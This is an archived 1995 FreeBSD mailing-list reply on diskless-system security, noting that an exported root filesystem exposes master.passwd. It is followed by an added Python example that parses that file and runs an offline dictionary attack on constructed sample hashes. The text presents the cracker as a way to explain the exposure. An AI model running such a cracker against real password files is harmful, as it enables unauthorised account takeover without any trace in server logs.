From owner-freebsd-questions Wed Sep 20 11:34:49 1995
Return-Path: owner-questions
Received: (from root@localhost) by freefall.freebsd.org (8.6.12/8.6.6) id LAA22795 for questions-outgoing; Wed, 20 Sep 1995 11:34:49 -0700
Received: from labinfo.iet.unipi.it (labinfo.iet.unipi.it [131.114.9.5]) by freefall.freebsd.org (8.6.12/8.6.6) with ESMTP id LAA22789 for ; Wed, 20 Sep 1995 11:34:43 -0700
Received: from localhost (luigi@localhost) by labinfo.iet.unipi.it (8.6.5/8.6.5) id UAA04849; Wed, 20 Sep 1995 20:38:16 +0200
From: Luigi Rizzo
Message-Id: <199509201838.UAA04849@labinfo.iet.unipi.it>
Subject: Re: * The security of DISKLESS? *
To: kallio@jyu.fi (Seppo Kallio)
Date: Wed, 20 Sep 1995 20:38:15 +0200 (MET DST)
Cc: questions@FreeBSD.ORG
In-Reply-To: from "Seppo Kallio" at Sep 20, 95 04:54:23 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1210
Sender: owner-questions@FreeBSD.ORG
Precedence: bulk

> What kind of security holes does DISKLESS include?
>
> Some thoughts:
>
> 1. Can a user boot the DISKLESS to single user and then use root privileges?

Yes, with a FreeBSD boot floppy :)

> 2. The root partition must be exported with -rootusr=root
>    - maybe it is possible to hide this dir so that the user cannot
>      save suid progs and login to the server and use them?
>    - maybe there is nosuid in exports preventing saving suid files to the
>      root partition
> 3. Other holes?

If you are referring to the answer I gave about how to set up a diskless system, the security hole is given by the need to export the root filesystem with root read permission. This means that you can see the encrypted passwords (master.passwd) and possibly start a brute-force attack against your system looking for passwords.

Luigi

====================================================================
Luigi Rizzo
Dip. di Ingegneria dell'Informazione    email: luigi@iet.unipi.it
Universita' di Pisa                     tel:   +39-50-568533
via Diotisalvi 2, 56126 PISA (Italy)    fax:   +39-50-568522
http://www.iet.unipi.it/~luigi/
====================================================================
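The point Luigi makes above is that once the exported root lets a client read master.passwd, every password hash on the server can be attacked offline: no login attempts hit the server, so nothing is logged and nothing rate-limits the guessing. The following is an added example, not part of the thread and not FreeBSD code, that parses a master.passwd file in its 10-field layout, triages what the file reveals before any guessing (empty passwords, locked accounts, crackable uid 0 accounts) and then runs a dictionary attack on the copied hashes. The sample file, the word list and the hash format are constructed: a 1995 FreeBSD file holds DES crypt(3) hashes, which this example replaces with a labelled stand-in (`$cst$salt$md5`) so it runs on any current Python without the removed `crypt` module; the guessing loop is identical, only the verifier callable changes.

```python
"""Parse a FreeBSD-style master.passwd and show what an attacker gains from
reading it over an NFS-exported root.  Added example; sample data constructed."""
import hashlib
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List


def stand_in_hash(salt: str, password: str) -> str:
    """Constructed stand-in for crypt(3): '$cst$<salt>$<md5 hex>'.
    A real 1995 file holds DES crypt hashes; only this verifier would differ."""
    digest = hashlib.md5((salt + password).encode()).hexdigest()
    return f"$cst${salt}${digest}"


def stand_in_verify(guess: str, stored: str) -> bool:
    """Recompute the stand-in hash with the stored salt and compare."""
    _, _tag, salt, _digest = stored.split("$", 3)
    return stand_in_hash(salt, guess) == stored


@dataclass
class Entry:
    name: str
    pw_hash: str
    uid: int
    gid: int
    gecos: str
    shell: str

    @property
    def state(self) -> str:
        if self.pw_hash == "":
            return "empty"   # no password at all: log in without guessing
        if self.pw_hash.startswith(("*", "!")):
            return "locked"  # no hash can ever match, nothing to crack
        return "hashed"      # crackable offline once the file is readable


def parse_master_passwd(text: str) -> List[Entry]:
    """master.passwd layout: name:password:uid:gid:class:change:expire:gecos:home:shell"""
    entries: List[Entry] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 10:
            raise ValueError(f"line {lineno}: expected 10 fields, got {len(fields)}")
        name, pw_hash, uid, gid, _cls, _change, _expire, gecos, _home, shell = fields
        entries.append(Entry(name, pw_hash, int(uid), int(gid), gecos, shell))
    return entries


def exposure_report(entries: List[Entry]) -> Dict[str, List[str]]:
    """What reading the file reveals before a single guess is made."""
    return {
        "empty": [e.name for e in entries if e.state == "empty"],
        "locked": [e.name for e in entries if e.state == "locked"],
        "hashed": [e.name for e in entries if e.state == "hashed"],
        "uid0_crackable": [e.name for e in entries if e.uid == 0 and e.state == "hashed"],
    }


def guess_offline(entries: List[Entry], wordlist: Iterable[str],
                  verify: Callable[[str, str], bool]) -> Dict[str, str]:
    """Dictionary attack run entirely on the copied file: no login attempts,
    no syslog entry on the server, no lockout.  Returns {name: password}."""
    words = list(wordlist)
    found: Dict[str, str] = {}
    for e in entries:
        if e.state != "hashed":
            continue
        for word in words:
            if verify(word, e.pw_hash):
                found[e.name] = word
                break
    return found


# Constructed sample file (hashes use the stand-in format above).
SAMPLE_MASTER_PASSWD = "\n".join([
    "# constructed sample in master.passwd layout",
    f"root:{stand_in_hash('ab', 'toor1995')}:0:0::0:0:Charlie &:/root:/bin/csh",
    "toor:*:0:0::0:0:Bourne-again Superuser:/root:",
    "daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin",
    "guest::1001:1001::0:0:Guest account:/home/guest:/bin/sh",
    f"alice:{stand_in_hash('xy', 'correct horse')}:1002:1002::0:0:Alice:/home/alice:/bin/csh",
])
WORDLIST = ["password", "toor1995", "alice", "letmein"]  # constructed


def main() -> None:
    entries = parse_master_passwd(SAMPLE_MASTER_PASSWD)
    for key, names in exposure_report(entries).items():
        print(f"{key:15} {names}")
    print("cracked:", guess_offline(entries, WORDLIST, stand_in_verify))


if __name__ == "__main__":
    main()
```

Against the constructed sample the report shows one account with no password (guest), two locked ones (toor, daemon), two with hashes, one of which is uid 0, and the dictionary attack recovers root's password while missing alice's. With real DES hashes the loop runs exactly the same way; the only difference is that the server's login audit never sees any of it, which is why the readable master.passwd, not the diskless client itself, is the hole in this setup.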